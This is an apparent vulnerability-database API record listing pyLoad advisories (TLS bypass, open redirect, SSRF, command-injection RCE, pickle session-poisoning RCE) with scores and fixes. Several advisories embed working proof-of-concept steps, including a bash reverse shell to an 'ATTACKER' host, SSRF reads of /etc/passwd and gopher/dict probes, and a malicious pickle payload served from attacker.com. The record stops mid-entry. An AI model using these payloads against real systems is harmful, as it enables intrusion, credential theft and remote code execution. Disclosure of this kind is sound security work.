Package Instance
Look up vulnerable packages by Package URL.
GET /api/packages/38667?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/38667?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0a5.dev532", "type": "pypi", "namespace": "", "name": "pyload-ng", "version": "0.5.0a5.dev532", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "0.5.0b3.dev100", "latest_non_vulnerable_version": "0.5.0b3.dev100", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37327?format=api", "vulnerability_id": "VCID-1k5h-nhcv-cke9", "summary": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The option (\"general\", \"ssl_verify\") is not on that allowlist. Any authenticated user with the non-admin SETTINGS permission can set general.ssl_verify = off, and every subsequent outbound pycurl request is made with SSL_VERIFYPEER=0 and SSL_VERIFYHOST=0 — TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. 
This vulnerability is fixed in 0.5.0b3.dev100.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42312", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05602", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42312" }, { "reference_url": "https://github.com/advisories/GHSA-4744-96p5-mp2j", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4744-96p5-mp2j" }, { "reference_url": "https://github.com/advisories/GHSA-ppvx-rwh9-7rj7", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-ppvx-rwh9-7rj7" }, { "reference_url": "https://github.com/advisories/GHSA-r7mc-x6x7-cqxx", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r7mc-x6x7-cqxx" }, { "reference_url": "https://github.com/advisories/GHSA-w48f-wwwf-f5fr", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w48f-wwwf-f5fr" }, { "reference_url": 
"https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-11T18:50:26Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42312", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42312" }, { "reference_url": "https://github.com/advisories/GHSA-ccxc-x975-4hh9", "reference_id": "GHSA-ccxc-x975-4hh9", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-ccxc-x975-4hh9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/50306?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev100", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100" } ], "aliases": [ "CVE-2026-42312", "GHSA-ccxc-x975-4hh9", "PYSEC-2026-126" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": 
"http://public2.vulnerablecode.io/vulnerabilities/VCID-1k5h-nhcv-cke9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46946?format=api", "vulnerability_id": "VCID-3355-ps9v-7ffh", "summary": "URL Redirection to Untrusted Site ('Open Redirect')\npyLoad is an open-source Download Manager written in pure Python. There is an open redirect vulnerability due to incorrect validation of input values when redirecting users after login. pyLoad is validating URLs via the `get_redirect_url` function when redirecting users at login. This vulnerability has been patched with commit fe94451.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-24808", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.02357", "scoring_system": "epss", "scoring_elements": "0.85234", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-24808" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/fe94451dcc2be90b3889e2fd9d07b483c8a6dccd", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N" }, { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-06T16:57:09Z/" } ], "url": "https://github.com/pyload/pyload/commit/fe94451dcc2be90b3889e2fd9d07b483c8a6dccd" 
}, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24808", "reference_id": "CVE-2024-24808", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24808" }, { "reference_url": "https://github.com/advisories/GHSA-g3cm-qg2v-2hj5", "reference_id": "GHSA-g3cm-qg2v-2hj5", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-g3cm-qg2v-2hj5" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-g3cm-qg2v-2hj5", "reference_id": "GHSA-g3cm-qg2v-2hj5", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N" }, { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-06T16:57:09Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-g3cm-qg2v-2hj5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48566?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev79", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-a7fd-nsys-qub1" }, { 
"vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hva8-kb62-rkax" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-xgcy-vqcp-43dj" }, { "vulnerability": "VCID-xs39-z9t4-wyh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev79" } ], "aliases": [ "CVE-2024-24808", "GHSA-g3cm-qg2v-2hj5" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3355-ps9v-7ffh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89123?format=api", "vulnerability_id": "VCID-4fna-mzsg-w7d5", "summary": "pyLoad: SSRF in parse_urls API endpoint via unvalidated URL parameter\n## Vulnerability Details\n\n**CWE-918**: Server-Side Request Forgery (SSRF)\n\nThe `parse_urls` API function in `src/pyload/core/api/__init__.py` (line 556) fetches arbitrary URLs server-side via `get_url(url)` (pycurl) without any URL validation, protocol restriction, or IP blacklist. 
An authenticated user with ADD permission can:\n\n- Make HTTP/HTTPS requests to internal network resources and cloud metadata endpoints\n- **Read local files** via `file://` protocol (pycurl reads the file server-side)\n- **Interact with internal services** via `gopher://` and `dict://` protocols\n- **Enumerate file existence** via error-based oracle (error 37 vs empty response)\n\n### Vulnerable Code\n\n**`src/pyload/core/api/__init__.py` (line 556)**:\n\n```python\ndef parse_urls(self, html=None, url=None):\n if url:\n page = get_url(url) # NO protocol restriction, NO URL validation, NO IP blacklist\n urls.update(RE_URLMATCH.findall(page))\n```\n\nNo validation is applied to the `url` parameter. The underlying pycurl supports `file://`, `gopher://`, `dict://`, and other dangerous protocols by default.\n\n## Steps to Reproduce\n\n### Setup\n\n```bash\ndocker run -d --name pyload -p 8084:8000 linuxserver/pyload-ng:latest\n```\n\nLog in as any user with ADD permission and extract the CSRF token:\n\n```bash\nCSRF=\n```\n\n### PoC 1: Out-of-Band SSRF (HTTP/DNS exfiltration)\n\n```bash\ncurl -s -b \"pyload_session_8000=<SESSION>\" -H \"X-CSRFToken: \" -H \"Content-Type: application/x-www-form-urlencoded\" -d \"url=http://ssrf-proof.<CALLBACK_DOMAIN>/pyload-ssrf-poc\" http://localhost:8084/api/parse_urls\n```\n\n**Result**: 7 DNS/HTTP interactions received on the callback server (Burp Collaborator). Screenshot attached in comments.\n\n### PoC 2: Local file read via file:// protocol\n\n```bash\n# Reading /etc/passwd (file exists) -> empty response (no error)\ncurl ... -d \"url=file:///etc/passwd\" http://localhost:8084/api/parse_urls\n# Response: {}\n\n# Reading nonexistent file -> pycurl error 37\ncurl ... -d \"url=file:///nonexistent\" http://localhost:8084/api/parse_urls\n# Response: {\"error\": \"(37, \\'Couldn't open file /nonexistent\\')\"}\n```\n\nThe difference confirms pycurl successfully reads local files. 
While `parse_urls` only returns extracted URLs (not raw content), any URL-like strings in configuration files or environment variables are leaked. The error vs success differential also serves as a **file existence oracle**.\n\nFiles confirmed readable:\n- `/etc/passwd`, `/etc/hosts`\n- `/proc/self/environ` (process environment variables)\n- `/config/settings/pyload.cfg` (pyLoad configuration)\n- `/config/data/pyload.db` (SQLite database)\n\n### PoC 3: Internal port scanning\n\n```bash\ncurl ... -d \"url=http://127.0.0.1:22/\" http://localhost:8084/api/parse_urls\n# Response: pycurl.error: (7, 'Failed to connect to 127.0.0.1 port 22')\n```\n\n### PoC 4: gopher:// and dict:// protocol support\n\n```bash\ncurl ... -d \"url=gopher://127.0.0.1:6379/_INFO\" http://localhost:8084/api/parse_urls\ncurl ... -d \"url=dict://127.0.0.1:11211/stat\" http://localhost:8084/api/parse_urls\n```\n\nBoth protocols are accepted by pycurl, enabling interaction with internal services (Redis, memcached, SMTP, etc.).\n\n## Impact\n\nAn authenticated user with ADD permission can:\n\n- **Read local files** via `file://` protocol (configuration, credentials, database files)\n- **Enumerate file existence** via error-based oracle (`Couldn't open file` vs empty response)\n- **Access cloud metadata endpoints** (AWS IAM credentials at `http://169.254.169.254/`, GCP service tokens)\n- **Scan internal network** services and ports via error-based timing\n- **Interact with internal services** via `gopher://` (Redis RCE, SMTP relay) and `dict://`\n- **Exfiltrate data** via DNS/HTTP to attacker-controlled servers\n\nThe multi-protocol support (`file://`, `gopher://`, `dict://`) combined with local file read capability significantly elevates the impact beyond a standard HTTP-only SSRF.\n\n## Proposed Fix\n\nRestrict allowed protocols and validate target addresses:\n\n```python\nfrom urllib.parse import urlparse\nimport ipaddress\nimport socket\n\ndef _is_safe_url(url):\n parsed = urlparse(url)\n if 
parsed.scheme not in ('http', 'https'):\n return False\n hostname = parsed.hostname\n if not hostname:\n return False\n try:\n for info in socket.getaddrinfo(hostname, None):\n ip = ipaddress.ip_address(info[4][0])\n if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:\n return False\n except (socket.gaierror, ValueError):\n return False\n return True\n\ndef parse_urls(self, html=None, url=None):\n if url:\n if not _is_safe_url(url):\n raise ValueError(\"URL targets a restricted address or uses a disallowed protocol\")\n page = get_url(url)\n urls.update(RE_URLMATCH.findall(page))\n```", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35187", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12628", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35187" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/4032e57d61d8f864e39f4dcfdb567527a50a9e1f", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:03:24Z/" } ], "url": "https://github.com/pyload/pyload/commit/4032e57d61d8f864e39f4dcfdb567527a50a9e1f" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-2wvg-62qm-gj33", "reference_id": 
"", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:03:24Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-2wvg-62qm-gj33" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35187", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35187" }, { "reference_url": "https://github.com/advisories/GHSA-2wvg-62qm-gj33", "reference_id": "GHSA-2wvg-62qm-gj33", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-2wvg-62qm-gj33" } ], "fixed_packages": [], "aliases": [ "CVE-2026-35187", "GHSA-2wvg-62qm-gj33" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4fna-mzsg-w7d5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90018?format=api", "vulnerability_id": "VCID-6ujx-ntw5-s7dy", "summary": "pyLoad: Improper Neutralization of Special Elements used in an OS Command\n### Summary\n\nThe `ADMIN_ONLY_OPTIONS` protection mechanism restricts security-critical configuration values (reconnect scripts, SSL certs, proxy credentials) to admin-only access. However, this protection is **only applied to core config options**, not to plugin config options. The `AntiVirus` plugin stores an executable path (`avfile`) in its config, which is passed directly to `subprocess.Popen()`. 
A non-admin user with SETTINGS permission can change this path to achieve remote code execution.\n\n### Details\n\n**Safe wrapper — `ADMIN_ONLY_OPTIONS` (core/api/__init__.py:225-235):**\n\n```python\nADMIN_ONLY_OPTIONS = {\n \"reconnect.script\", # Blocks script path change\n \"webui.host\", # Blocks bind address change\n \"ssl.cert_file\", # Blocks cert path change\n \"ssl.key_file\", # Blocks key path change\n # ... other sensitive options\n}\n```\n\n**Where it IS enforced — core config (core/api/__init__.py:255):**\n\n```python\ndef set_config_value(self, section, option, value):\n if f\"{section}.{option}\" in ADMIN_ONLY_OPTIONS:\n if not self.user.is_admin:\n raise PermissionError(\"Admin only\")\n # ...\n```\n\n**Where it is NOT enforced — plugin config (core/api/__init__.py:271-272):**\n\n```python\n # Plugin config - NO admin check at all\n self.pyload.config.set_plugin(category, option, value)\n```\n\n**Dangerous sink — AntiVirus plugin (plugins/addons/AntiVirus.py:75):**\n\n```python\ndef scan_file(self, file):\n avfile = self.config.get(\"avfile\") # User-controlled via plugin config\n avargs = self.config.get(\"avargs\")\n subprocess.Popen([avfile, avargs, target]) # RCE\n```\n\n### PoC\n\n```bash\n# As non-admin user with SETTINGS permission:\n\n# 1. Set AntiVirus executable to a reverse shell\ncurl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \\\n -d 'section=plugin' \\\n -d 'option=AntiVirus.avfile' \\\n -d 'value=/bin/bash'\n\ncurl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \\\n -d 'section=plugin' \\\n -d 'option=AntiVirus.avargs' \\\n -d 'value=-c \"bash -i >& /dev/tcp/ATTACKER/4444 0>&1\"'\n\n# 2. Enable the AntiVirus plugin\ncurl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \\\n -d 'section=plugin' \\\n -d 'option=AntiVirus.activated' \\\n -d 'value=True'\n\n# 3. 
Add a download - when it completes, AntiVirus.scan_file() runs the payload\ncurl -b session_cookie -X POST http://TARGET:8000/api/add_package \\\n -d 'name=test' \\\n -d 'links=http://example.com/test.zip'\n\n# Result: reverse shell as the pyload process user\n```\n\n### Additional Finding: Arbitrary File Read via storage_folder\n\nThe `storage_folder` validation at `core/api/__init__.py:238-246` uses inverted logic — it prevents the new value from being INSIDE protected directories, but not from being an ANCESTOR of everything. Setting `storage_folder=/` combined with `GET /files/get/etc/passwd` gives arbitrary file read to non-admin users with SETTINGS+DOWNLOAD permissions.\n\n### Impact\n\n- **Remote Code Execution** — Non-admin user can execute arbitrary commands via AntiVirus plugin config\n- **Privilege escalation** — SETTINGS permission (non-admin) escalates to full system access\n- **Arbitrary file read** — Via storage_folder manipulation\n\n### Remediation\n\nApply `ADMIN_ONLY_OPTIONS` to plugin config as well:\n\n```python\n# In set_config_value():\nADMIN_ONLY_PLUGIN_OPTIONS = {\n \"AntiVirus.avfile\",\n \"AntiVirus.avargs\",\n # ... 
any plugin option that controls executables or paths\n}\n\nif section == \"plugin\" and option in ADMIN_ONLY_PLUGIN_OPTIONS:\n if not self.user.is_admin:\n raise PermissionError(\"Admin only\")\n```\n\nOr better: validate that `avfile` points to a known AV binary before passing to `subprocess.Popen()`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35463", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00135", "scoring_system": "epss", "scoring_elements": "0.33094", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35463" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-08T14:45:57Z/" } ], "url": "https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-w48f-wwwf-f5fr", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": 
"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-08T14:45:57Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-w48f-wwwf-f5fr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35463", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35463" } ], "fixed_packages": [], "aliases": [ "CVE-2026-35463", "GHSA-w48f-wwwf-f5fr" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6ujx-ntw5-s7dy" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89437?format=api", "vulnerability_id": "VCID-9rb6-kh78-sbdf", "summary": "pyLoad: Unprotected storage_folder enables arbitrary file write to Flask session store and code execution (Incomplete fix for CVE-2026-33509)\n## Summary\n\nThe fix for CVE-2026-33509 (GHSA-r7mc-x6x7-cqxx) added an `ADMIN_ONLY_OPTIONS` set to block non-admin users from modifying security-critical config options. The `storage_folder` option is not in this set and passes the existing path restriction because the Flask session directory is outside both PKGDIR and userdir. A user with SETTINGS and ADD permissions can redirect downloads to the Flask filesystem session store, plant a malicious pickle payload as a predictable session file, and trigger arbitrary code execution when any HTTP request arrives with the corresponding session cookie.\n\n## Required Privileges\n\nThe chain requires a single non-admin user with both `SETTINGS` (to change `storage_folder`) and `ADD` (to submit a download URL) permissions. These are independent bitmask flags that can be assigned together by an admin. 
The final RCE trigger is unauthenticated: any HTTP request with the crafted session cookie causes deserialization.\n\n## Root Cause\n\n`storage_folder` at `src/pyload/core/api/__init__.py:238-246` has a path check that blocks writing inside PKGDIR or userdir using `os.path.realpath`. However, Flask's filesystem session directory (`/tmp/pyLoad/flask/` in the standard Docker deployment) is outside both restricted paths.\n\npyload configures Flask with `SESSION_TYPE = \"filesystem\"` at `__init__.py:127`. The cachelib `FileSystemCache` stores session files as `md5(\"session:\" + session_id)` and deserializes them with `pickle.load()` on every request that carries the corresponding session cookie.\n\n## Proven RCE Chain\n\nTested against `lscr.io/linuxserver/pyload-ng:latest` Docker image.\n\n**Step 1** — Change download directory to Flask session store:\n\n POST /api/set_config_value\n {\"section\":\"core\",\"category\":\"general\",\"option\":\"storage_folder\",\"value\":\"/tmp/pyLoad/flask\"}\n\nThe path check resolves `/tmp/pyLoad/flask/` via `realpath`. It does not start with PKGDIR (`/lsiopy/.../pyload/`) or userdir (`/config/`). Check passes.\n\n**Step 2** — Compute the target session filename:\n\n md5(\"session:ATTACKER_SESSION_ID\") = 92912f771df217fb6fbfded6705dd47c\n\nFlask-Session uses cachelib which stores files as `md5(key_prefix + session_id)`. 
The default key prefix is `session:`.\n\n**Step 3** — Host and download the malicious pickle payload:\n\n import pickle, os, struct\n class RCE:\n def __reduce__(self):\n return (os.system, (\"id > /tmp/pyload-rce-success\",))\n session = {\"_permanent\": True, \"rce\": RCE()}\n payload = struct.pack(\"I\", 0) + pickle.dumps(session, protocol=2)\n # struct.pack(\"I\", 0) = cachelib timeout header (0 = never expires)\n\nServe as `http://attacker.com/92912f771df217fb6fbfded6705dd47c` and submit:\n\n POST /api/add_package\n {\"name\":\"x\",\"links\":[\"http://attacker.com/92912f771df217fb6fbfded6705dd47c\"],\"dest\":1}\n\nThe file is saved to `/tmp/pyLoad/flask/92912f771df217fb6fbfded6705dd47c`.\n\n**Step 4** — Trigger deserialization (unauthenticated):\n\n curl http://target:8000/ -b \"pyload_session_8000=ATTACKER_SESSION_ID\"\n\nThe session cookie name is `pyload_session_` + the configured port number (`__init__.py:128`).\n\nFlask loads the session file. cachelib reads the 4-byte timeout header, confirms the entry is not expired, and calls `pickle.load()`. The RCE gadget executes.\n\n**Result**:\n\n $ docker exec pyload-poc cat /tmp/pyload-rce-success\n uid=1000(abc) gid=1000(users) groups=1000(users)\n\n## Impact\n\nA non-admin user with SETTINGS + ADD permissions achieves arbitrary code execution as the pyload service user. The final trigger requires no authentication. 
The attacker can:\n\n- Execute arbitrary commands with the privileges of the pyload process\n- Read environment variables (API keys, credentials)\n- Access the filesystem (download history, user database)\n- Pivot to other network resources\n\n## Suggested Fix\n\nAdd `storage_folder` to the ADMIN_ONLY set, or extend the path check to block writing to auto-consumed temporary directories (Flask session store, Jinja bytecode cache, pyload temp directory):\n\n ADMIN_ONLY_OPTIONS = {\n ...\n (\"general\", \"storage_folder\"), # ADDED: prevents session poisoning RCE\n ...\n }\n\nAlso correct the existing wrong option names:\n\n (\"webui\", \"ssl_certfile\"), # FIXED: was \"ssl_cert\" (dead code)\n (\"webui\", \"ssl_keyfile\"), # FIXED: was \"ssl_key\" (dead code)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35464", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22917", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35464" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": 